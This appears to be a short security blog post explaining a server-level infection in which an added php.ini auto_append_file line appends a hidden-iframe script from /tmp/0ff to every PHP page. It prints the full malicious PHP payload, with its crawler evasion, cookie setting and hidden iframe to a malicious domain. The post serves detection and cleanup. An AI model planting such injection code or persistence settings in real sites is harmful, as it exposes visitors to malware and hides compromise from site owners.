Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).
We are seeing an increased number of infected sites with malicious iframes, similar to this one:
<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src=”http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2″></iframe>
These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:
;auto_append_file = “0ff”
This simple line in the php.ini makes all the php scripts append the output of the file 0ff (/tmp/0ff) to them. So even if your files look clean, the malware is still displayed to anyone visiting the site.
This is the code of the 0ff file:
<?php
if(!@isset($_COOKIE[‘PHPSESS1D’]) &&
!@preg_match(‘/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|
Mac OS|Opera Mini|Chrome|Apple/i’,$_SERVER[‘HTTP_USER_AGENT’])) {
echo ‘<script type=”text/javascript”>
d=new Date();
d.setDate(d.getDate()+1);
document.cookie=”PHPSESS1D=1; path=/; expires=” + d.toGMTString();
</script>’;
echo ‘<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;
visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src=”http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2″></iframe>’;
}
So if you are seeing those hidden iframes, try to look at your PHP and main Apache configurations.
Leave a reply
